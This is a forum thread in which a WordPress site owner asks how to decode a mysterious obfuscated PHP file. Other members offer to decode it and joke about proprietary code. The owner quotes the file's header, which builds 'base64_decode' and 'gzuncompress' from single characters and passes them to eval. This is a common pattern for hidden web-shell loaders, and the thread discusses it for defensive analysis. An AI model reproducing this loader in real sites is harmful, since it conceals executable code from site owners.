Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


mystery php file question
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

mystery php file question

MisterGMisterG Member
edited November 2015 in Help

I have come across a mystery php file in one of my WordPress sites. The whole file is code. What can I use to convert it so I can see what it is doing? Prefer something in Linux but I can use Windows too.

This is just a snip of the code so you can tell what I talking about.

esPYW4QeymzzfE8Wanm75dnjzFieY1RUxja+T2uiF/DmJvHH18v3GF4Oi63rg2t7OLIfQ
X1HMRWV+rozdwaePS4j4W3Sedzwzqj0u71mFRgBr0VrCXsi43T754ymamrCexBJOzF7JGhHNL
J1VfjJ+X4w9seyHIyhfDlm6PXZ++zhMGlRO5p2GLUtQdggiuBVbB1U9MsNvJ14L5cz6bDxGXvCJh
NIQyBEXm93HO7/9oTdhQaWYNgTbi10QP4uMA44XURNm2wXGx14qnoDLiFCAtYZOm8Xpu
/e+/CRabqg0AF6Bo0N85mtyqCAzQuip9uXzz6mr189EY7E8SjkfZ6p3vw0uxR9m6IGtYJGa9M0
GH99kBvj9zS0JXxari4B

Comments

  • pastebin.com all the contents.

  • timnboystimnboys Member
    edited November 2015

    well is it ioncube encoded? or just base64 encoded? basically could you show the header of the file?

  • MisterGMisterG Member
    edited November 2015

    @timnboys Looks like base64 and it is uncompressing something.

    `<?php $wpconfig = "b" . "a" . "s" . "e" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "d" . "e";
    $wordpress1 = "g" . "z" . "u" . "n" . "c" . "o" . "m" . "p" . "r" . "e" . "s" . "s";eval/test*
    /(/
    test*/$wordpress1/test*/(/test*/$wpconfig('eNq9fflTU0nX8L/yTNXUDHwE3qyQjB/

  • timnboystimnboys Member
    edited November 2015

    okay just pastebin the contents as I can easily decode the base64 for you.
    Also it looks like a half baked obfuscation system someone used either give me the contents in pm or whatever and I will decode it for you and get the base code back.
    as they use base64+gzip deflate alot thinking it really obfuscates the code when it doesn't and can easily be decoded back by people like me who know its structure etc

  • @timnboys I sent it over as a PM. Are you hand decoding or is there something I can run to decode myself if this happens again? Thank you for your help.

  • And that's was the time someone on LET was tricked into cracking a bad obfuscated proprietary code.

  • @Aga said:

    And that's was the time someone on LET was tricked into cracking a bad obfuscated proprietary code.

    lol

  • timnboystimnboys Member
    edited November 2015

    @MisterG said:
    timnboys I sent it over as a PM. Are you hand decoding or is there something I can run to decode myself if this happens again? Thank you for your help.

    Redacted

  • Considering that's just a bad obfuscated hack I still like my version of the story better :P

  • Aga said: And that's was the time someone on LET was tricked into cracking a bad obfuscated proprietary code.

    Anyone that can "crack" (rather: reverse) it has an idea what it does then also - i doubt they'd just send back the unencoded file if they notice it is WHMCS core licensing file or whatever.

  • William said: i doubt they'd just send back the unencoded file if they notice it is WHMCS core licensing file or whatever.

    I agree with you, maybe it was not very clear but my comment was meant to be a joke.

  • @Aga said:

    Really because your comments come off as mean sorry but that is how it appears to me.
    And if it was a joke but didn't sound like one at least put something like it was a joke or something so people don't think your being serious(as propriety code is very important and I don't want to let no one cheat the dev/author of something from their well deserved hard earned cash.)

  • @timnboys Thank you for your help I really appreciate it.

Sign In or Register to comment.